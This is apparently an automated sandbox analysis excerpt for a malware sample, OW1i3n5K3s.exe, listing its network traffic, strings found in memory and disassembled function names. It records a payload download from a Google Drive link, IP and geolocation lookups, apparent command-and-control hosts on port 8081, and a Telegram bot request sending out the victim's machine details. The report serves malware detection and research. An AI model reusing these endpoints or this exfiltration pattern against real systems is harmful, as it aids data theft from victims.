            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49724 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=19xFZwGXpJOSwPWK3hTC0Z2UBRNX2ducA HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=19xFZwGXpJOSwPWK3hTC0Z2UBRNX2ducA&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:927537%0D%0ADate%20and%20Time:%2009/03/2025%20/%2001:02:15%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20927537%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 07 Mar 2025 22:29:57 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
            Source: OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032E81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
            Source: OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032E81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
            Source: OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000033063000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
            Source: OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003303E000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003302B000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003304C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
            Source: OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003303E000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003302B000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003304C000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032E81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032E81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: OW1i3n5K3s.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003303E000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003302B000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003304C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
            Source: OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032E81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032E81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
            Source: OW1i3n5K3s.exe, 00000008.00000002.2507519072.000000003414F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
            Source: OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000033063000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram
            Source: OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000033063000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032F66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003305B000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032F66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003305B000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032F66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
            Source: OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000033063000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003305B000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032F66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:927537%0D%0ADate%20a
            Source: OW1i3n5K3s.exe, 00000008.00000003.1403195156.0000000002647000.00000004.00000020.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000003.1403547568.0000000002647000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: OW1i3n5K3s.exe, 00000008.00000002.2507519072.000000003414F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: OW1i3n5K3s.exe, 00000008.00000002.2507519072.000000003414F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: OW1i3n5K3s.exe, 00000008.00000002.2507519072.000000003414F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032FED000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003301E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
            Source: OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032FED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en4
            Source: OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032FE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
            Source: OW1i3n5K3s.exe, 00000008.00000002.2478960805.00000000025D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: OW1i3n5K3s.exe, 00000008.00000002.2480112081.0000000002C40000.00000004.00001000.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2478960805.0000000002615000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=19xFZwGXpJOSwPWK3hTC0Z2UBRNX2ducA
            Source: OW1i3n5K3s.exe, 00000008.00000003.1455368440.0000000002640000.00000004.00000020.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2478960805.000000000263F000.00000004.00000020.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000003.1455467642.0000000002645000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: OW1i3n5K3s.exe, 00000008.00000003.1455368440.0000000002640000.00000004.00000020.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2478960805.000000000263F000.00000004.00000020.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000003.1455467642.0000000002645000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/5
            Source: OW1i3n5K3s.exe, 00000008.00000003.1403195156.0000000002647000.00000004.00000020.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2478960805.0000000002629000.00000004.00000020.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000003.1403547568.0000000002647000.00000004.00000020.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2478960805.0000000002615000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=19xFZwGXpJOSwPWK3hTC0Z2UBRNX2ducA&export=download
            Source: OW1i3n5K3s.exe, 00000008.00000002.2507519072.000000003414F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: OW1i3n5K3s.exe, 00000008.00000002.2507519072.000000003414F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
            Source: OW1i3n5K3s.exe, 00000008.00000002.2507519072.000000003414F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: OW1i3n5K3s.exe, 00000008.00000002.2507519072.000000003414F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
            Source: OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003303E000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003302B000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003304C000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032F3F000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032F66000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032ECF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032ECF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032ECF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
            Source: OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003303E000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003302B000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003304C000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032F3F000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032EF9000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032F66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
            Source: OW1i3n5K3s.exe, 00000008.00000003.1403195156.0000000002647000.00000004.00000020.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000003.1403547568.0000000002647000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: OW1i3n5K3s.exe, 00000008.00000002.2507519072.000000003414F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
            Source: OW1i3n5K3s.exe, 00000008.00000003.1403195156.0000000002647000.00000004.00000020.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000003.1403547568.0000000002647000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: OW1i3n5K3s.exe, 00000008.00000003.1403195156.0000000002647000.00000004.00000020.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000003.1403547568.0000000002647000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: OW1i3n5K3s.exe, 00000008.00000002.2507519072.000000003414F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
            Source: OW1i3n5K3s.exe, 00000008.00000003.1403195156.0000000002647000.00000004.00000020.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000003.1403547568.0000000002647000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: OW1i3n5K3s.exe, 00000008.00000003.1403195156.0000000002647000.00000004.00000020.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000003.1403547568.0000000002647000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003300F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
            Source: OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003301E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/4
            Source: OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000033019000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
            Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
            Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.4:49720 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.217.16.129:443 -> 192.168.2.4:49722 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49740 version: TLS 1.2
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 1_2_00405846 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,1_2_00405846
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 1_2_00403645 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_00403645
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_00403645 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,8_2_00403645
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeFile created: C:\Windows\resources\0809Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 1_2_00406DA01_2_00406DA0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 1_2_6EDC1BFF1_2_6EDC1BFF
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_00406DA08_2_00406DA0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_0258D2788_2_0258D278
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_025853708_2_02585370
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_0258C1468_2_0258C146
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_0258C7388_2_0258C738
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_0258C46F8_2_0258C46F
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_0258D5488_2_0258D548
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_0258CA088_2_0258CA08
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_0258F9618_2_0258F961
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_0258E9888_2_0258E988
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_025869A08_2_025869A0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_02583E098_2_02583E09
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_02586FC88_2_02586FC8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_0258CFAA8_2_0258CFAA
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_0258CCD88_2_0258CCD8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_02589DE08_2_02589DE0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_02583AA18_2_02583AA1
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_0258E97A8_2_0258E97A
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_025829EC8_2_025829EC
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_027312B28_2_027312B2
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_027312B88_2_027312B8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_02737B708_2_02737B70
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_027304488_2_02730448
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_35F851488_2_35F85148
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_35F818508_2_35F81850
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_35F81FA88_2_35F81FA8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_35F82A908_2_35F82A90
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_35F896688_2_35F89668
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_35F8CDC08_2_35F8CDC0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_35F89D388_2_35F89D38
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_35F8513F8_2_35F8513F
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_35F8F9308_2_35F8F930
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_35F8F9238_2_35F8F923
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_35F8F4D88_2_35F8F4D8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_35F8F4C88_2_35F8F4C8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_35F88CC08_2_35F88CC0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_35F88CB18_2_35F88CB1
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_35F8F0808_2_35F8F080
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_35F8F0718_2_35F8F071
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_35F800408_2_35F80040
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_35F8EC288_2_35F8EC28
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_35F8EC188_2_35F8EC18
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_35F800068_2_35F80006
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_35F817EF8_2_35F817EF
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_35F8E7D08_2_35F8E7D0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_35F8E7CF8_2_35F8E7CF
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_35F81F988_2_35F81F98
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_35F8E3788_2_35F8E378
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_35F8E36B8_2_35F8E36B
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_35F80B308_2_35F80B30
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_35F8DF208_2_35F8DF20
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_35F80B208_2_35F80B20
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_35F8DF118_2_35F8DF11
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_35F8DAC88_2_35F8DAC8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_35F8DAB98_2_35F8DAB9
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_35F8D6708_2_35F8D670
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_35F8D6608_2_35F8D660
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_35F8D2188_2_35F8D218
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361746208_2_36174620
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_36177B788_2_36177B78
